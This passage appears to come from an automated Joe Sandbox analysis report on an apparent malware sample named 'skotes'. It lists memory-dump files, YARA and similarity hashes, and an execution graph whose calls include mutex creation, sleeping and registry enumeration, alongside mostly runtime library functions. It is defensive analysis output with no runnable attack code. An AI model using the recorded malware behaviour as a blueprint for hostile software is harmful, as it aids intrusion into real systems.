                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 32384418-0
                                                                                                                                                                    • Opcode ID: 9164bf77744288e150209721828d7f16bd5e822fb2be1a500afcdccee2ca71b1
                                                                                                                                                                    • Instruction ID: b7405b99c402927f77947860a41ba0b3e575ce6ff365c6ed10a7dddbe51b4276
                                                                                                                                                                    • Opcode Fuzzy Hash: 9164bf77744288e150209721828d7f16bd5e822fb2be1a500afcdccee2ca71b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 78A1F270901A26EFDB10DF64D9457DAB7EAFF19320F188129E816D7341EB31EA84CB91
                                                                                                                                                                    Function 0062BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                    • Opcode ID: 58fd67c4c11203932cf14b05111fb7094349591e679eb1b5a4820c573e917f48
                                                                                                                                                                    • Instruction ID: 544551bdc226d239f300b9b3947630fadadfc86e669365350b3237f1a9ad1a81
                                                                                                                                                                    • Opcode Fuzzy Hash: 58fd67c4c11203932cf14b05111fb7094349591e679eb1b5a4820c573e917f48
                                                                                                                                                                    • Instruction Fuzzy Hash: E9213271A00529AFDF40EFA4ED819BEB7BAEF08720F101029F901B7251DB709D419FA4
                                                                                                                                                                    Function 0064F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___free_lconv_mon
                                                                                                                                                                    • String ID: 8"g$`'g
                                                                                                                                                                    • API String ID: 3903695350-151162620
                                                                                                                                                                    • Opcode ID: 8006c1cbe04065090410a99767146c77c67963709850ba2cc05367a8a9fd8417
                                                                                                                                                                    • Instruction ID: 54d7d7944e58c16dcaffaa2bb04a10d0618e493d9590c52a280c8a87ccc0f0a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 8006c1cbe04065090410a99767146c77c67963709850ba2cc05367a8a9fd8417
                                                                                                                                                                    • Instruction Fuzzy Hash: 74315A32A00201EFEB61AF79D845B9B73EBEF04352F10442DF049D7696DE70AC808B59

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:6.4%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:7.4%
                                                                                                                                                                    Total number of Nodes:1128
                                                                                                                                                                    Total number of Limit Nodes:118
                                                                                                                                                                    execution_graph 36623 62d762 36633 62d76e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 36623->36633 36624 62d8ce ___scrt_fastfail 36659 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36624->36659 36626 62d8db 36660 6465ed GetPEB GetPEB RtlAllocateHeap CallUnexpected 36626->36660 36628 62d8e3 ___security_init_cookie 36630 62d8e9 __scrt_common_main_seh 36628->36630 36629 62d7be 36631 62d83f 36642 6495bc 36631->36642 36633->36624 36633->36629 36633->36631 36658 646603 3 API calls 3 library calls 36633->36658 36635 62d845 36646 626d30 36635->36646 36643 6495c5 36642->36643 36644 6495ca 36642->36644 36661 649320 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36643->36661 36644->36635 36662 61a960 Sleep CreateMutexA 36646->36662 36650 626d45 36651 61d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 36650->36651 36652 626d4a 36651->36652 36653 624fc0 8 API calls 36652->36653 36654 626d4f 36653->36654 36655 616020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 36654->36655 36656 626d54 36655->36656 36657 616020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 36656->36657 36657->36656 36658->36631 36659->36626 36660->36628 36661->36644 36664 61a98e 36662->36664 36663 61a9a7 36667 61ce40 36663->36667 36664->36663 36672 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36664->36672 36666 61a9b0 36673 627a00 36667->36673 36669 61ce92 36687 615c10 36669->36687 36671 61ce9d 36672->36666 36674 627a26 36673->36674 36675 627a2d 36674->36675 36676 627a62 36674->36676 36677 627a81 36674->36677 36675->36669 36678 627ab9 36676->36678 36679 627a69 36676->36679 36680 62d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 36677->36680 36684 627a76 std::_Rethrow_future_exception 36677->36684 36707 612480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 36678->36707 36699 62d3e2 36679->36699 36680->36684 36683 627a6f 36683->36684 36708 646c6a 36683->36708 36684->36669 36742 615940 36687->36742 36691 615c6a 36766 614b30 36691->36766 36693 615d17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 36693->36671 36694 615c7b Concurrency::details::_TaskCollection::_ReleaseAlias 36695 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36694->36695 36696 615ce7 Concurrency::details::_TaskCollection::_ReleaseAlias 36694->36696 36695->36696 36696->36693 36697 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36696->36697 36698 615d47 36697->36698 36702 62d3e7 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 36699->36702 36701 62d401 36701->36683 36702->36701 36703 612480 Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 36702->36703 36711 648be1 36702->36711 36705 62d40d CallUnexpected Concurrency::details::ResourceManager::ResourceManager 36703->36705 36717 6438af RtlAllocateHeap RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy Concurrency::details::ResourceManager::CleanupTopologyInformation 36703->36717 36706 6124c3 36706->36683 36707->36683 36741 646bf6 RtlAllocateHeap __dosmaperr ___std_exception_copy 36708->36741 36710 646c79 ___std_exception_copy 36716 64b04b Concurrency::details::SchedulerProxy::CreateExternalThreadResource _unexpected 36711->36716 36712 64b089 36718 6475f6 36712->36718 36713 64b074 RtlAllocateHeap 36715 64b087 36713->36715 36713->36716 36715->36702 36716->36712 36716->36713 36717->36706 36721 64a7c8 36718->36721 36722 64a7d2 _unexpected 36721->36722 36724 6475fb 36722->36724 36732 64d82f 36722->36732 36724->36715 36725 64a813 _unexpected 36726 64a81b _unexpected 36725->36726 36727 64a853 36725->36727 36736 64adf5 36726->36736 36740 64a49f RtlAllocateHeap _unexpected 36727->36740 36730 64a85e 36731 64adf5 __freea RtlAllocateHeap 36730->36731 36731->36724 36734 64d83c Concurrency::details::SchedulerProxy::CreateExternalThreadResource _unexpected 36732->36734 36733 64d867 RtlAllocateHeap 36733->36734 36735 64d87a __dosmaperr 36733->36735 36734->36733 36734->36735 36735->36725 36737 64ae00 36736->36737 36739 64ae1b __dosmaperr 36736->36739 36738 6475f6 __dosmaperr RtlAllocateHeap 36737->36738 36737->36739 36738->36739 36739->36724 36740->36730 36741->36710 36773 627f80 2 API calls 4 library calls 36742->36773 36744 61596b 36745 6159e0 36744->36745 36774 627f80 2 API calls 4 library calls 36745->36774 36747 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36759 615a45 36747->36759 36748 615c09 36791 628200 RtlAllocateHeap RtlAllocateHeap 36748->36791 36749 615bdd __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36749->36691 36759->36747 36759->36748 36759->36749 36775 6280c0 36759->36775 36790 615730 RtlAllocateHeap RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 36759->36790 36767 614dc2 36766->36767 36768 614b92 36766->36768 36767->36694 36770 614ce5 36768->36770 36794 646da6 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap __fassign 36768->36794 36795 628ca0 2 API calls 4 library calls 36768->36795 36770->36767 36796 628ca0 2 API calls 4 library calls 36770->36796 36773->36744 36774->36759 36779 6280de __InternalCxxFrameHandler 36775->36779 36780 628104 36775->36780 36776 6281ee 36792 629270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36776->36792 36778 6281f3 36793 612480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 36778->36793 36779->36759 36780->36776 36782 628158 36780->36782 36783 62817d 36780->36783 36782->36778 36786 62d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 36782->36786 36785 62d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 36783->36785 36787 628169 std::_Rethrow_future_exception 36783->36787 36784 6281f8 36785->36787 36786->36787 36788 6281d0 Concurrency::details::_TaskCollection::_ReleaseAlias 36787->36788 36789 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36787->36789 36788->36759 36789->36776 36790->36759 36793->36784 36794->36768 36795->36768 36796->36770 36797 64c1c4 36798 64c367 36797->36798 36800 64c1ee 36797->36800 36799 6475f6 __dosmaperr RtlAllocateHeap 36798->36799 36806 64c352 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z ___std_exception_copy 36799->36806 36800->36798 36801 64c239 36800->36801 36812 65292b 36801->36812 36803 64c259 36816 652139 36803->36816 36805 64c26d 36805->36806 36823 652165 36805->36823 36808 64c27f 36808->36806 36830 652191 36808->36830 36810 64c291 36810->36806 36837 652988 RtlAllocateHeap ___scrt_is_nonwritable_in_current_image CallUnexpected 36810->36837 36814 652937 ___scrt_is_nonwritable_in_current_image CallUnexpected 36812->36814 36813 65295c 36813->36803 36814->36813 36838 65284d 36814->36838 36817 652145 36816->36817 36818 65215a 36816->36818 36819 6475f6 __dosmaperr RtlAllocateHeap 36817->36819 36818->36805 36820 65214a 36819->36820 36947 646c5a RtlAllocateHeap ___std_exception_copy 36820->36947 36822 652155 36822->36805 36824 652186 36823->36824 36825 652171 36823->36825 36824->36808 36826 6475f6 __dosmaperr RtlAllocateHeap 36825->36826 36827 652176 36826->36827 36948 646c5a RtlAllocateHeap ___std_exception_copy 36827->36948 36829 652181 36829->36808 36831 6521b2 36830->36831 36832 65219d 36830->36832 36831->36810 36833 6475f6 __dosmaperr RtlAllocateHeap 36832->36833 36834 6521a2 36833->36834 36949 646c5a RtlAllocateHeap ___std_exception_copy 36834->36949 36836 6521ad 36836->36810 36837->36806 36839 652899 36838->36839 36851 6528a0 36839->36851 36935 64b04b RtlAllocateHeap RtlAllocateHeap 